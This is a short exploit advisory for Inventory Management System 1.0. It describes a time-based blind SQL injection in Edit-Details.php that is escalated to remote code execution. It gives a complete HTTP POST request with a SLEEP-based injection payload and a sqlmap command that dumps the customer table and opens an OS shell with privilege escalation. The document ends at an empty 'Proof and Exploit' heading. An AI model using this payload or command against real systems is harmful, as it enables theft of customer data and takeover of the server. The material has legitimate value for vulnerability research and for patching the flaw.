Authored by Hejap Zairy

Inventory Management System version 1.0 suffers from a remote SQL injection vulnerability that can be leveraged to gain remote code execution.

# Title: Inventory Management System 1.0 Blind SQLi To Rce
# Author: Hejap Zairy
# Date: 12.07.2022
# Vendor:
# Software:
# Reference:
# Tested on: Windows, MySQL, Apache

#vulnerability Code php

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '[email protected]' WHERE `cust`.`custid` = 'C200114'' at line 2

[+] Payload POST:
POST /0day/Edit-Details.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
Connection: close
Cookie: PHPSESSID=o0p5vujcgkn8pm6llls4nj7qq7
Upgrade-Insecure-Requests: 1
name=ABHI+boss&password=abhi%40123&phone=422234654& (SELECT 5316 FROM (SELECT(SLEEP(5)))Fohe)-- oRCH&cust_update=Submit+Query

#Blind SQLi Time to Rce

sqlmap -r 0day_hejap.txt --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p address -D order_mgmt -T cust --dump -hh --os-shell --priv-esc

# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc

# Proof and Exploit: